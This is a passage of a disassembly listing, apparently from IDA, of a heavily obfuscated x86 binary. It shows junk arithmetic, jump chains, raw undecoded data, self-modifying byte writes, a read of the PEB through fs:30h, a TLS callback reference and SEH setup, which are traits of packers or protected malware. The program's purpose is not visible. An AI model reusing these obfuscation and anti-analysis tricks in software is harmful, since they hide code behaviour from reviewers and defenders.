mov ebx, offset loc_48A6B5
jmp loc_488B76
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
jno loc_48A4B2
jmp loc_48CA6D
; ---------------------------------------------------------------------------
dd 0CEF58100h, 0E96033F5h, 0FFFFD40Ch, 0E6A5E800h, 2FE9FFFFh
dd 0FFFFECh
; =============== S U B R O U T I N E =======================================
sub_48A96C proc near ; CODE XREF: znnrn47v:loc_48CCADp
; FUNCTION CHUNK AT 004886E0 SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg ebx, [esp+0]
mov edi, ebx
pop ebx
jmp loc_4886E0
sub_48A96C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0F700h
; ---------------------------------------------------------------------------
setalc
jmp loc_48AC29
; ---------------------------------------------------------------------------
align 4
loc_48A984: ; DATA XREF: sub_48A5BC+BAEo
pop eax
push ecx
loc_48A986: ; DATA XREF: sub_48A5BC-C9Do
db 64h
push offset loc_48C04F
jmp loc_4894DD
; ---------------------------------------------------------------------------
align 2
word_48A992 dw 128Bh ; DATA XREF: znnrn47v:0048A878o
dd 0A43C2AF6h, 15F1850Fh, 0A5E90000h, 0E9FFFFEDh, 0FFFFF96Bh
dd 0DA12EA81h, 0F28178E1h, 6A3BE6F7h, 0C281D503h, 0CB3D2D5h
dd 0FFD882E9h, 0C300FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A920
loc_48A9C4: ; CODE XREF: sub_48A920+17j
jmp loc_48BB7C
; END OF FUNCTION CHUNK FOR sub_48A920
; ---------------------------------------------------------------------------
align 2
jmp loc_488FCE
; ---------------------------------------------------------------------------
align 10h
loc_48A9D0: ; CODE XREF: znnrn47v:0048C3E3j
xchg esi, [esp]
pop esi
loc_48A9D4: ; CODE XREF: znnrn47v:loc_488286j
add edi, 86DA0209h
call loc_488377
add cl, ch ; CODE XREF: sub_488549+38EAj
mov ch, dl
; ---------------------------------------------------------------------------
db 0FFh
dd 0D7DEE9FFh, 69E9FFFFh, 23h, 6A6E900h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48A9F7: ; CODE XREF: sub_48A5BC:loc_48BB76j
mov esi, eax
xchg esi, [esp+8+var_8]
push 55AC593Ch
pop eax
xor eax, 3252DDA7h
or eax, 0BAD366E6h
add eax, offset byte_48D571
push offset word_48BC66
jmp loc_48BE5E
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
xchg ecx, [esp]
mov ebx, ecx
xchg ebx, [esp]
mov ecx, [esp+10h]
mov dword ptr [ecx], 10001h
jmp loc_48B2D5
; ---------------------------------------------------------------------------
align 2
mov byte ptr [ecx], 87h
loc_48AA39: ; CODE XREF: znnrn47v:0048A0A5j
pop ecx
pop eax
sub eax, 0E0F43748h
xor eax, 0CA0CCD30h
sub eax, 9ED9FB01h
call sub_48A086
; ---------------------------------------------------------------------------
dw 0
dd 0FFD52EE9h
db 0FFh
; ---------------------------------------------------------------------------
loc_48AA59: ; CODE XREF: znnrn47v:0048960Bj
xchg ecx, ebx
cmp ebp, esi
jmp near ptr dword_48872C+4
; ---------------------------------------------------------------------------
locret_48AA62: ; CODE XREF: znnrn47v:loc_48A446j
retn
; ---------------------------------------------------------------------------
align 4
jmp loc_48C439
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488549
loc_48AA69: ; CODE XREF: sub_488549:loc_4894F5j
pop ebx
xor ebx, 0D6E018DEh
or ebx, 0FF069D0Dh
add ebx, 0DFCD5696h
or ebx, 0CE47BB12h
add ebx, 4203AAA1h
add edi, ebx
pop ebx
jmp loc_48BE2E
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
dd 2C689C57h, 5F066122h, 0D5E2E950h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_48AA9F: ; DATA XREF: sub_48C14F:loc_48C652o
mov byte ptr [ebx], 0C3h
pop ebx
push 0C2A957D0h
pop edi
add edi, 825710E3h
and edi, 0A8A5A867h
jmp loc_48AFB8
; ---------------------------------------------------------------------------
push offset loc_48C913
jmp loc_48AC7B
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48AAC6: ; CODE XREF: sub_48A5BC:loc_48A669j
push ecx
mov ecx, ebx
xchg ecx, [esp+4+var_4]
pushf
push 370E0F2Ch
pop ebx
add ebx, 8D55C163h
jmp loc_48CC8E
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_48AADF proc near ; CODE XREF: sub_48BDC9+5p
; FUNCTION CHUNK AT 0048CEF6 SIZE 00000014 BYTES
xchg edi, [esp+0]
pop edi
pushf
push 0FF8F91ABh
pop edx
add edx, 8A132B16h
rol edx, 1Fh
xor edx, 0DCABD83Dh
jmp loc_48CEF6
sub_48AADF endp
; ---------------------------------------------------------------------------
sbb esi, ecx
add edi, 7CEFD6CCh
jmp sub_48B35E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_590. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_48AB0C: ; CODE XREF: znnrn47v:0048923Fj
jmp near ptr dword_488D84+1Dh
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
dd 1CE6h, 87E98700h, 6859240Ch, 8A3535A3h, 0DD9CE959h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48AB2A: ; CODE XREF: znnrn47v:0048B71Ej
call sub_48C70B
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_48AB31: ; CODE XREF: znnrn47v:00488595j
jmp loc_48A881
; ---------------------------------------------------------------------------
align 4
dd 0E956D10Bh, 0FFFFD2C6h, 0E9C10B00h, 1366h, 53F5D081h
dd 0E6E9DFF9h, 16h, 38840F00h, 81FFFFDBh, 820D46CDh, 0DE781E1h
dd 81A0609Dh, 295916FFh, 0DB15E9F5h, 0FFFFh
; ---------------------------------------------------------------------------
locret_48AB74: ; CODE XREF: znnrn47v:0048976Bj
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48AB77: ; CODE XREF: znnrn47v:00489CD0j
jmp loc_48B462
; ---------------------------------------------------------------------------
dd 0E9DA2B00h, 0FFFFEC52h, 8E0F0000h, 12h, 0FFE3FFE9h
dd 8700C6FFh, 1C75E858h
db 3 dup(0)
; ---------------------------------------------------------------------------
locret_48AB9B: ; CODE XREF: znnrn47v:0048CB86j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
word_48AB9E dw 1F68h ; DATA XREF: znnrn47v:0048CB81o
; ---------------------------------------------------------------------------
jmp short loc_48ABA9
; ---------------------------------------------------------------------------
dw 5F33h
dd 0A0D2EF81h
db 63h
; ---------------------------------------------------------------------------
loc_48ABA9: ; CODE XREF: znnrn47v:0048ABA0j
xchg eax, edx
or edi, 0CECBD539h
jmp near ptr dword_488D84+37h
; ---------------------------------------------------------------------------
db 5Fh, 81h, 0E7h
dd 0D62D4DD0h, 0C7F3EF81h, 9E80B37h, 0FFFFFEh, 20C0E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_48ABCF: ; CODE XREF: znnrn47v:0048A0AAj
jmp loc_48B31E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488F9C
loc_48ABD4: ; CODE XREF: sub_488F9C+Dj
jmp loc_4892FC
; END OF FUNCTION CHUNK FOR sub_488F9C
; ---------------------------------------------------------------------------
align 2
dw 800Fh
dd 0FFFFE896h, 5A241487h, 60BE953h, 34870000h, 8B535E24h
; CODE XREF: znnrn47v:loc_48B943p
dd 241C87DFh, 5FE9F88Bh, 0FFFFEEh
db 0
; ---------------------------------------------------------------------------
loc_48ABFD: ; CODE XREF: znnrn47v:0048A1B2j
xchg edi, [esp]
pop edi
mov eax, [eax]
test eax, 70h
inc ecx
test [eax], dl
pop es
; ---------------------------------------------------------------------------
dd 0BF570000h, 48BECBh, 778E9h, 81000000h, 0C71BDDC5h
dd 0E91389CCh, 0FFFFF0C5h
db 0
; ---------------------------------------------------------------------------
loc_48AC29: ; CODE XREF: znnrn47v:0048A97Dj
xchg esi, [esp]
pop esi
push 3A0F1BA8h
pop edx
sub edx, 3068C1Eh
jmp near ptr dword_4891CC+2
; ---------------------------------------------------------------------------
loc_48AC3E: ; DATA XREF: znnrn47v:0048A123o
mov al, [eax]
sub al, 99h
push 8C9253E2h
pop edx
and edx, 236501D1h
jmp loc_48CA9E
; ---------------------------------------------------------------------------
align 4
dd 993E8h, 0CFD9E900h, 1768FFFFh, 0E97AB594h, 0FFFFD1AEh
dd 0C30000h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48AC6C: ; CODE XREF: sub_48C14F-3B64j
jmp loc_48B774
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 2
jmp loc_48B122
; ---------------------------------------------------------------------------
align 4
locret_48AC78: ; CODE XREF: znnrn47v:0048BBF6j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48AC7B: ; CODE XREF: znnrn47v:0048AABFj
jmp locret_48ACD7
; ---------------------------------------------------------------------------
dd 880F0000h, 1A23h
; =============== S U B R O U T I N E =======================================
sub_48AC88 proc near ; CODE XREF: sub_48A3D2p
; znnrn47v:0048ACC2j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00489F37 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048C7F8 SIZE 00000005 BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
mov byte ptr [edx], 87h
xchg eax, [esp+0]
mov edx, eax
pop eax
jmp loc_48C7F8
sub_48AC88 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_48AC9C: ; DATA XREF: sub_48B39C+4A1o
xor eax, 0BDB6FFAFh
add eax, ebp
push esi
push 95339E9Bh
jmp loc_48C7E9
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_48ACB1: ; CODE XREF: znnrn47v:0048A6DCj
rol eax, 12h
add eax, 7A2707B1h
popf
xchg eax, [esp]
push edi
loc_48ACBF: ; DATA XREF: znnrn47v:00488C55o
ja short loc_48AD29
sti
jnb short sub_48AC88
into
jmp loc_488788
; ---------------------------------------------------------------------------
align 4
loc_48ACCC: ; CODE XREF: znnrn47v:loc_48C3D3j
; DATA XREF: sub_48C3C5+4o
push offset sub_48851C
jmp locret_48D0AC
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_48ACD7: ; CODE XREF: znnrn47v:loc_48AC7Bj
retn
; ---------------------------------------------------------------------------
dd 6D8E900h, 0D9E90000h, 13h, 903C600h, 0FFE8DEE8h, 0CFCDE9FFh
dd 0FFFFh
dword_48ACF4 dd 2464C081h ; DATA XREF: sub_488669:loc_48BA39o
db 24h, 10h, 52h
byte_48ACFB db 40h ; DATA XREF: sub_488669+1o
dd 0FFF533E8h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48AD03: ; CODE XREF: znnrn47v:0048CCD1j
jmp loc_48A054
; ---------------------------------------------------------------------------
dd 0FFF15AE9h
db 0FFh
; ---------------------------------------------------------------------------
loc_48AD0D: ; DATA XREF: sub_4889EB+Ao
push ecx
mov ecx, offset loc_48B669
jmp loc_48B65E
; ---------------------------------------------------------------------------
dd 0CA8A0F00h, 0C1000000h, 0EF8111EAh, 0AE485DF0h
; CODE XREF: znnrn47v:0048B93Dj
db 0E9h
; ---------------------------------------------------------------------------
loc_48AD29: ; CODE XREF: znnrn47v:loc_48ACBFj
adc eax, 0E8FFFFF1h
push esi
clc
; ---------------------------------------------------------------------------
dd 8B64FFFFh, 3005h, 0EA82E800h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AD3F: ; CODE XREF: sub_488955-878j
jmp loc_48A631
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 2 dup(0), 58h
; ---------------------------------------------------------------------------
loc_48AD47: ; CODE XREF: znnrn47v:0048862Dj
add eax, 0C07BADF0h
and eax, 0FC28C645h
test eax, 800h
jmp loc_48C163
; ---------------------------------------------------------------------------
align 10h
mov esi, 8BD1E713h
push ebx
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48AD66: ; CODE XREF: sub_48C14F:loc_489532j
rol eax, 11h
push esi
mov esi, offset loc_48B1ED
jmp loc_48B280
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dd 0BAE80000h, 0C6FFFFECh, 815F8707h, 7A1B9CE6h, 98C6816Eh
dd 87B40B9Fh, 8BC32434h, 0E9D20910h, 482h, 0FD8B5700h
dd 8B243C87h, 0E651E9EAh, 0FFFFh
; ---------------------------------------------------------------------------
loc_48ADA8: ; DATA XREF: znnrn47v:loc_48B5DFo
push eax
mov eax, offset loc_48CEDC
jmp loc_487FF5
; ---------------------------------------------------------------------------
push 8DF6C9A4h
pop edx
and edx, 1198C7A9h
push offset loc_48C844
jmp locret_48C83A
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_48ADCB: ; CODE XREF: znnrn47v:00489B3Ej
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48ADCE: ; CODE XREF: znnrn47v:00489EB1j
jmp locret_48BAE9
; ---------------------------------------------------------------------------
align 4
dd 0E9EF8B00h, 0BFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48ADDC: ; CODE XREF: sub_489135+3896j
add esi, eax
loc_48ADDE: ; CODE XREF: sub_489135:loc_48A227j
jnz loc_48C5F4
jmp loc_489A94
; END OF FUNCTION CHUNK FOR sub_489135
; =============== S U B R O U T I N E =======================================
sub_48ADE9 proc near ; DATA XREF: sub_48A3D2+27F5o
; FUNCTION CHUNK AT 0048CC82 SIZE 00000005 BYTES
mov eax, [eax]
popf
mov al, [eax]
sub al, 99h
push offset dword_4882DC
jmp loc_48CC82
sub_48ADE9 endp
; ---------------------------------------------------------------------------
dw 0B951h
dd offset loc_48A3C6
dd 0FFCE61E9h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_48AE05 proc near ; CODE XREF: znnrn47v:0048A3AEp
; FUNCTION CHUNK AT 0048C9DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE4B SIZE 00000005 BYTES
xchg ebx, [esp+0]
xchg ebp, [esp+0]
mov ebx, ebp
pop ebp
push ebp
pop eax
jmp loc_48CE4B
sub_48AE05 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
; ---------------------------------------------------------------------------
test large ds:9, ecx
loc_48AE1E: ; CODE XREF: znnrn47v:0048B811j
jmp loc_48CE52
; ---------------------------------------------------------------------------
db 0E9h
; ---------------------------------------------------------------------------
mov ebx, 0FFFFE3h
adc eax, ecx
cmp edx, ecx
jmp loc_48B724
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_613. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_48B9DB
loc_48AE34: ; CODE XREF: sub_48B9DB-32D6j
jmp loc_488F2E
; END OF FUNCTION CHUNK FOR sub_48B9DB
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_488549
loc_48AE3A: ; CODE XREF: sub_488549+Aj
jmp loc_48C357
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
byte_48AE3F db 81h ; DATA XREF: sub_48B5EC+13o
dd 4714CBF0h, 67E85293h, 12h, 0DD2AE900h, 0FFFFh ; CODE XREF: sub_48CF6A+Dj
; ---------------------------------------------------------------------------
loc_48AE54: ; CODE XREF: znnrn47v:0048BFC4j
jmp locret_48B5DD
; ---------------------------------------------------------------------------
align 2
loc_48AE5A: ; CODE XREF: znnrn47v:0048BB25j
or eax, 6FFE0C0Ch
rol eax, 8
add eax, 130C2E2h
call sub_48A71A
jmp loc_4882A8
; ---------------------------------------------------------------------------
align 4
dd 13880F00h, 0FFFFFDEh, 0FFCEFC85h, 0E734E9FFh, 0F281FFFFh
dd 0B8BAC4FDh
; ---------------------------------------------------------------------------
loc_48AE8C: ; DATA XREF: znnrn47v:0048828Do
test eax, edx
pop edx
loc_48AE8F: ; CODE XREF: znnrn47v:004889E5j
jz loc_48B10E
jmp loc_48922B
; ---------------------------------------------------------------------------
dw 8100h
dd 0CC3157F6h, 1FC6C103h, 2702CE81h, 5EE8061Dh, 0Fh
db 0
byte_48AEB1 db 8Bh, 0, 59h ; DATA XREF: sub_489CDA-1464o
dd 8B240C87h, 0F166E9E9h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AEBE: ; CODE XREF: sub_488955:loc_48C6FFj
xchg ebp, [esp+0]
mov ebx, ebp
pop ebp
mov bh, 84h
push esp
add al, 0
add [eax+13h], ch
or ah, ch
aas
jmp loc_4893FF
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
loc_48AED4: ; CODE XREF: znnrn47v:0048CB6Cj
xchg ebx, [esp]
pop ebx
mov byte ptr [esi], 3
pop esi
call sub_4883C2
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AEE1: ; CODE XREF: znnrn47v:0048B526j
; sub_488955+4772j
jz loc_4891F9
xchg eax, [esp+0]
pop eax
mov byte ptr [edi], 0Fh
pop edi
add ebx, 120420C1h
popf
test eax, ebx
jmp loc_48C6FF
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
loc_48AEFD: ; DATA XREF: znnrn47v:0048BD95o
xor esi, 8C164581h
push offset loc_48BBE2
jmp loc_4883AC
; ---------------------------------------------------------------------------
loc_48AF0D: ; CODE XREF: znnrn47v:loc_48A44Bj
mov eax, esi
pop esi
xor eax, 0DC66D992h
or eax, 0CE02E439h
add eax, 10681928h
push esi
pushf
jmp loc_48B5C5
; ---------------------------------------------------------------------------
db 0Fh, 88h, 7Bh
dd 81000017h, 4B4DC3E1h
; ---------------------------------------------------------------------------
aam 81h
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AF36: ; CODE XREF: sub_488955+2625j
sar dword ptr [esi], 0B6h
mov esp, 240C877Fh
inc ecx
adc eax, offset dword_45B0C0
jmp loc_48D0C5
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 0E9h, 92h, 2
dd 15FF0000h, 45B0C0h, 106E9h
db 0
; ---------------------------------------------------------------------------
loc_48AF59: ; CODE XREF: znnrn47v:0048CE64j
xor eax, eax
push offset loc_48B73C
jmp locret_48B9FD
; ---------------------------------------------------------------------------
db 2 dup(0), 0C1h
dd 0C31B05CEh, 529E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AF71: ; CODE XREF: sub_488955:loc_4890C8j
jnz loc_48CECA
add [eax-36h], ch
jp short loc_48AF36
jnb short loc_48AFA1
retn 0E955h
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 45h, 1Fh, 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C82C
loc_48AF85: ; CODE XREF: sub_48C82C+8j
call sub_488955
add bl, al ; CODE XREF: znnrn47v:loc_48B2E3j
add cl, ch
js short near ptr loc_48AFAA+4
; END OF FUNCTION CHUNK FOR sub_48C82C
; ---------------------------------------------------------------------------
dd 0C3850000h, 0FFE196E9h, 8DE99CFFh
db 0E4h, 2 dup(0FFh)
byte_48AF9F db 87h ; CODE XREF: znnrn47v:loc_48B5CAp
db 34h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48AFA1: ; CODE XREF: sub_488955+2627j
and al, 5Eh
push eax
mov eax, ebx
xchg eax, [esp+0]
push eax
loc_48AFAA: ; CODE XREF: sub_48C82C-189Ej
call sub_48A541
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48920C
loc_48AFB1: ; CODE XREF: sub_48920C-63Aj
jmp loc_48A5D9
; END OF FUNCTION CHUNK FOR sub_48920C
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_48AFB8: ; CODE XREF: znnrn47v:0048AAB5j
jmp near ptr dword_48A6A4+2
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
dd 39E90E89h, 0FFFFE8h, 689C01C6h, 48B694h, 204E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_48AFD7: ; CODE XREF: znnrn47v:0048946Aj
mov byte ptr [ebx], 0C3h
pop ebx
mov ecx, edx
pop edx
pop ebp
loc_48AFDF: ; CODE XREF: znnrn47v:0048A573j
jmp loc_48CE08
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_617. PRESS KEYPAD "+" TO EXPAND]
align 2
loc_48AFE6: ; CODE XREF: znnrn47v:0048C4EFj
jmp loc_48B981
; ---------------------------------------------------------------------------
loc_48AFEB: ; DATA XREF: sub_48C8C2o
push 6542EEE3h
xchg ebp, [esp]
mov eax, ebp
pop ebp
sub eax, 394FC639h
jmp loc_48B030
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
; ---------------------------------------------------------------------------
lea esp, [ebx+51FFFFF6h]
jmp sub_48B6E8
; ---------------------------------------------------------------------------
align 10h
loc_48B010: ; CODE XREF: znnrn47v:loc_488CE0j
mov byte ptr [eax], 87h
pop eax
push edi
mov edi, esi
jmp loc_48CF0A
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B01D: ; CODE XREF: znnrn47v:00489E94j
mov edi, 48981Fh
jmp near ptr dword_489A6C+8
; ---------------------------------------------------------------------------
align 4
dd 5FE9E91Bh, 0FFFFF3h
; ---------------------------------------------------------------------------
loc_48B030: ; CODE XREF: znnrn47v:0048AFFCj
and eax, 780D660Dh
jns loc_48D005
loc_48B03C: ; CODE XREF: znnrn47v:0048A463j
jmp near ptr dword_488330+2
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
sar dword ptr [ebp+1B9433F8h], 0D3h
push edi
mov eax, 0CAD021A4h
jmp loc_48D005
; ---------------------------------------------------------------------------
align 4
dword_48B058 dd 0FFD28BE8h, 0E90000FFh, 0FFFFD0A0h, 0C7810000h, 3A49027Bh
; DATA XREF: znnrn47v:00489FCEo
dd 0E9243C87h, 1B3Ch, 8B510000h, 0AA1E68CBh, 0CCE90048h
dd 0FFFFD3h
db 0
; ---------------------------------------------------------------------------
locret_48B085: ; CODE XREF: znnrn47v:0048B5E4j
retn
; ---------------------------------------------------------------------------
dw 0F00h
dd 0FFEC538Dh, 241C87FFh, 8B241487h, 1ABAE9DAh, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B09F: ; CODE XREF: znnrn47v:0048C7AFj
jmp loc_489F4F
; ---------------------------------------------------------------------------
dd 0D58B5200h, 8B241487h, 242C87EAh, 22566853h, 29E986A5h
dd 0FFFFD8h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BD79
loc_48B0BC: ; CODE XREF: sub_48BD79:loc_48B874j
xchg ebx, [esp+0]
push ecx
mov ecx, offset byte_4881F5
jmp loc_48954A
; END OF FUNCTION CHUNK FOR sub_48BD79
; ---------------------------------------------------------------------------
align 4
loc_48B0CC: ; CODE XREF: znnrn47v:loc_48C595j
call eax
jmp loc_48D0E4
; ---------------------------------------------------------------------------
loc_48B0D3: ; CODE XREF: znnrn47v:loc_48C913j
push edx
mov edx, offset loc_48A72E
jmp loc_48C9D3
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B0DF: ; CODE XREF: znnrn47v:loc_48A8A2j
mov byte ptr [ebx], 0Fh
pop ebx
mov eax, large fs:30h
push 488A2Ch
jmp near ptr dword_487A48+3Eh
; ---------------------------------------------------------------------------
dd 0E99D0000h, 1928h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B0FE: ; CODE XREF: znnrn47v:0048CA76j
xchg edx, [esp]
mov ecx, edx
pop edx
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
dd 0F0ABE900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_48B10E: ; CODE XREF: znnrn47v:loc_48AE8Fj
; sub_489582+34C0j
; DATA XREF: ...
call near ptr dword_487ACC+15Ch
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_48B115: ; CODE XREF: znnrn47v:0048963Aj
jmp loc_4887A4
; ---------------------------------------------------------------------------
align 4
loc_48B11C: ; CODE XREF: znnrn47v:0048829Dj
jmp locret_488210
; ---------------------------------------------------------------------------
align 2
loc_48B122: ; CODE XREF: znnrn47v:0048AC72j
add ecx, eax
pop eax
mov [ecx], eax
push ecx
pushf
push 98E3A7F9h
jmp near ptr dword_489054+2
; ---------------------------------------------------------------------------
db 8Bh
dd 241C8718h, 0CC30E85Bh, 0FFFFh
dword_48B140 dd 116h ; DATA XREF: sub_489135+32EDr
align 8
dd 0DF6BD09Dh, 0B6E90000h, 0FFFFE8h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BACA
loc_48B155: ; CODE XREF: sub_48BACA-3016j
jmp nullsub_590
; END OF FUNCTION CHUNK FOR sub_48BACA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48B15A: ; CODE XREF: sub_48C14F:loc_48C1DCj
call sub_48C3C5
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B160: ; CODE XREF: znnrn47v:00489231j
jmp loc_489609
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48B167: ; CODE XREF: sub_48A5BC-C98j
mov byte ptr [eax], 9Ch
push offset loc_48A984
jmp nullsub_574
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
dd 24148700h, 7068535Ah, 5BA75BC2h, 6A6CE381h, 0C3813FA7h
dd 0D945450Dh, 0FFFFBDE9h, 810F00FFh, 0FFFFEF02h, 0FFE4E5E9h
dd 0F0000FFh, 0FFD63C8Dh, 6890FFFh, 2B000003h, 0F043E9F1h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_48B1B3: ; CODE XREF: znnrn47v:loc_48B30Aj
mov ebx, ecx
pop ecx
loc_48B1B6: ; DATA XREF: znnrn47v:0048BF90o
xchg ecx, [esp]
mov ebp, ecx
pop ecx
retn
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_48B1BE proc near ; CODE XREF: sub_48A5BC+FBp
; znnrn47v:0048BD04p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00487D84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488385 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488CA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488F4E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004892EA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048A2F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048A4DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A8E2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048B4F6 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0048BDB6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048BE87 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048BF75 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048CBEB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048D0AF SIZE 00000005 BYTES
mov eax, offset TlsCallbacks_ptr
jmp loc_48A4DD
sub_48B1BE endp
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B1C9: ; CODE XREF: znnrn47v:004898C7j
add edi, 0B889C492h
add edi, ebp
call loc_48B6D0
add bl, al ; CODE XREF: sub_48C14F:loc_48B1EDj
; sub_48C8B3-5B9j
add cl, ch
sal esi, 0FFh
inc dword ptr [eax]
add cl, ch
or esi, ebp
; ---------------------------------------------------------------------------
db 0FFh
dd 0E95E00FFh, 0FFFFCB6Bh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48B1ED: ; CODE XREF: sub_48C14F-595j
; DATA XREF: sub_48C14F-13E5o
jno short near ptr loc_48B1D6+1
stosd
sar edi, cl
inc dword ptr [eax]
add cl, ch
add cl, [esi]
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dd 0E9000000h, 0FFFFEC59h, 0C7F78100h, 8191ECE2h, 0A88366C7h
dd 243C873Fh, 0FFEAFCE9h, 0C30000FFh, 18E90000h, 68FFFFDEh
dd 48891Ch, 198EE9h, 51000000h, 0FFF8E8E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_48B232: ; CODE XREF: znnrn47v:loc_4882BCj
mov large fs:0, esp
